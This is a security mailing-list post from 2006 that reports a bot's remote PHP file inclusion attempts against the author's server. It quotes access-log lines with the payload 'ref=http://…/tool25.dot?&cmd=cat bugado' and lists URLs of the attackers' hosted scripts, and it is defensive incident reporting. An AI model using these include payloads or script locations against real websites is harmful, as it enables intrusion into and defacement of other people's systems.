Defacing Groups using PHP Include Attacks as Vector

For the most part I ignore the dozens of daily attacks against my system but 
this one caught my eye. Looks like some defacing groups are writing/implementing
perl scripts to identify query strings, and attempt php inclusion attacks 
against them (not using known exploits). Below is a log snippet.

202.226.224.67 - - [08/Jan/2006:21:32:43 -0500] "GET / HTTP/1.0" 200 37172 "-" 
"lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:44 -0500] "GET 
/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 
200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:45 -0500] "GET 
/webservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado 
HTTP/1.0" 200 24083 "-" "lwp-triv
ial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:46 -0500] "GET 
/phishing/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado 
HTTP/1.0" 200 30626 "-" "lwp-trivia
l/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:47 -0500] "GET 
/database/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado 
HTTP/1.0" 200 24267 "-" "lwp-trivia
l/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:48 -0500] "GET 
/appservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado 
HTTP/1.0" 200 24521 "-" "lwp-triv
ial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:49 -0500] "GET 
//lib/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado 
HTTP/1.0" 200 47471 "-" "lwp-trivial/1.
35"
202.226.224.67 - - [08/Jan/2006:21:32:50 -0500] "GET 
/archive/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado 
HTTP/1.0" 200 25445 "-" "lwp-trivial
/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:51 -0500] "GET 
/development/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado
 HTTP/1.0" 200 24286 "-" "lwp-tri
vial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:52 -0500] "GET 
/ws/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado 
HTTP/1.0" 200 29316 "-" "lwp-trivial/1.35
"
202.226.224.67 - - [08/Jan/2006:21:32:53 -0500] "GET 
//pen-test/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado 
HTTP/1.0" 200 29892 "-" "lwp-trivi
al/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:54 -0500] "GET 
/ajax/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado 
HTTP/1.0" 200 28338 "-" "lwp-trivial/1.
35"
202.226.224.67 - - [08/Jan/2006:21:32:55 -0500] "GET 
/appfirewall/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado
 HTTP/1.0" 200 24073 "-" "lwp-tri
vial/1.35"

The script located at www.sanicentrum.be might interest some of you, as well as 
the include file it uses at http://www.sanicentrum.be/private/therules25.dot
and the many scripts it uses/looks for.

Working Referenced Links
* http://www.sanicentrum.be/private/tool25.dot
* http://www.sanicentrum.be/private/writer25.dot
* http://www.sanicentrum.be/private/get25.dot
* http://www.sanicentrum.be/private/filed25.dot
* http://www.sanicentrum.be/private/filed_put25.dot (Of Interest)
* http://www.sanicentrum.be/private/copyd25.dot
* http://www.sanicentrum.be/private/flist25.dot
* http://www.sanicentrum.be/private/style25.dot (Because every defacement group 
needs html templating :)

Non working (at this time)
* http://www.sanicentrum.be/private/safe25.dot

I've contacted sans since the parent host *appears* to be hacked. 

 - Robert
http://www.cgisecurity.com/ Website Security News, and more!
http://www.cgisecurity.com/index.rss [RSS Feed]


-------------------------------------------------------------------------------
Watchfire's AppScan is the industry's first and leading web application 
security testing suite, and the only solution to provide comprehensive 
remediation tasks at every level of the application. See for yourself. 
Download AppScan 6.0 today.

https://www.watchfire.com/securearea/appscansix.aspx?id=701300000003Ssh
-------------------------------------------------------------------------------